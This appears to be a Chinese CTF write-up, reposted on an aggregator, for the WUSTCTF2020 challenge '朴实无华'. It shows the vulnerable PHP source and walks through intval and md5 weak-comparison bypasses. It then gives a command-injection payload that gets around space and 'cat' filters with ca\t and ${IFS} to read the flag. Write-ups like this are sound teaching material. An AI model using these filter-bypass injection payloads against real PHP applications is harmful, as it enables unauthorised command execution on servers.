当前位置: 首页 > news >正文

[WUSTCTF2020]朴实无华(特详解)

一开始说header出问题了

就先dirsaerch扫一遍

发现robot.txt

image-20240208163014395

访问一下

image-20240208163055795

去看看,好好好,肯定不是得

image-20240208163121879

他一开始说header有问题,不妨抓包看看,果然有东西

image-20240208163307717

访问看看,乱码修复一下,在之前的博客到过

image-20240208163436669

<img src="/img.jpg">
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
​
​
//level 1
if (isset($_GET['num'])){$num = $_GET['num'];if(intval($num) < 2020 && intval($num + 1) > 2021){echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";}else{die("金钱解决不了穷人的本质问题");}
}else{die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){$md5=$_GET['md5'];if ($md5==md5($md5))echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";elsedie("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{die("去非洲吧");
}
​
//get flag
if (isset($_GET['get_flag'])){$get_flag = $_GET['get_flag'];if(!strstr($get_flag," ")){$get_flag = str_ireplace("cat", "wctf2020", $get_flag);echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";system($get_flag);}else{die("快到非洲了");}
}else{die("去非洲吧");
}
?> 

很明显要绕过三次

先看第一个

要求num小于2020,且num+1大于2021.

用到:intval 绕过

  这个函数是强制转换为int类型。

  进行加 1 时会先将$a的科学计数法解析然后再加 1 。也就是说我们传入 12e3 第一次intval会为12 ,+1后会取得12001那么我们成功绕过了。

首先先看一下这个

<?php
echo '3e3' ; 
?> 
//结果为3e3 
<?php 
echo '3e3'  + 1; 
?> 
//结果为3001

这是因为在第一个 echo 语句中,'3e3' 被视为字符串,因此会直接输出其内容 '3e3'。而在第二个语句中,虽然 '3e3' 被当作字符串,但由于与数字相加,PHP 尝试将其转换为数字。在这种情况下,它将 '3e3' 解释为科学记数法,表示 3 乘以 10 的 3 次方,即 3000,然后再加上 1,所以结果为 3001。

因此

<?php
$a="4e3";
echo intval($a);
?>
// 4   字符串部分没有转换
<?php
$a="3e4";
echo intval($a+1);
?>
//4001

因为是get传参数,会自动套上" ",所以我们传参3e3就是字符串"3e3"

num=3e3

image-20240208164332595

第二个绕过

要求我们上传的$md5==md5($md5),注意这里是弱比较

==弱类型比较中,字符'0e123'和字符'0e456'虽然是字符类型,但是因为==比较不比较数据类型,只比较值,而值就是科学计数法的表示格式,结果都是0,所以相等,返回true ===强类型比较中,字符'0e123'和字符'0e456'在比较数据类型的时候就被当作字符类型,而字符'0e123'和字符'0e456'当然不相等,所以返回false

PlaintextMD5 Hash
0e2159620170e291242476940776845150308577824
0e12848383080e708279691820928818722257405159
0e11371269050e291659922323405260514745084877
0e8070971100e318093639164485566453180786895
0e7300833520e870635875304277170259950255928

那么只要MD5前后都是0e开头就行了

image-20240208165234087

MD5绕过参考的这位师傅浅谈PHP中哈希比较缺陷问题及哈希强比较相关问题_哈希连接 不比较-CSDN博客

第三个绕过

就是过滤了空格和cat, wctf2020

好在都可以被替换

代替cat: more、less、head、tail、sort、ca\t

代替空格:$IFS、${IFS}、$IFS$1、$IFS$9

先ls看看

image-20240208165454784

直接上

?num=3e3&md5=0e215962017&get_flag=ca\t${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

image-20240208165658096

 结束了

http://www.lryc.cn/news/296679.html

相关文章:

  • 下载已编译的 OpenCV 包在 Visual Studio 下实现快速配置
  • 【Linux系统学习】3.Linux用户和权限
  • 视频美颜SDK开发指南:从入门到精通的技术实践
  • Electron基本介绍
  • 使用网关过滤器,根据业务规则实现微服务动态路由
  • PKI - 03 密钥管理(如何进行安全的公钥交换)
  • Bee+SpringBoot稳定的Sharding、Mongodb ORM功能(同步 Maven)
  • HarmonyOS SDK 助力新浪新闻打造精致易用的新闻应用
  • IT行业有哪些证书含金量高呢?
  • zlib交叉编译(rv1126)
  • 数字孪生与智慧园区的融合:打造未来产业生态的新篇章
  • nodejs将console.log保存到log.txt文档中(electron工具)
  • 微服务的幂等性
  • Redis之基础篇
  • 靶机实战bwapp亲测xxe漏洞攻击及自动化XXE注射工具分析利用
  • openGauss学习笔记-216 openGauss性能调优-确定性能调优范围-硬件瓶颈点分析-CPU
  • 【教程】Linux使用git自动备份和使用支持文件恢复的rm命令
  • 记录使用M1 Mac开发LVGL嵌入式项目
  • 【SpringBoot】JWT令牌
  • Python爬虫 Beautiful Soup库详解#4
  • Tkinter教程21:Listbox列表框+OptionMenu选项菜单+Combobox下拉列表框控件的使用+绑定事件
  • Django中的SQL注入攻击防御策略
  • ORM模型类
  • Java强训day14(选择题编程题)
  • Redis核心技术与实战【学习笔记】 - 31.番外篇:Redis客户端如何与服务器端交换命令和数据
  • 电缆线的阻抗50Ω,真正含义是什么?
  • 校园团餐SAAS系统源码
  • 图数据库neo4j入门
  • Multisim14.0仿真(五十五)汽车转向灯设计
  • 2402C++,C++的反向代理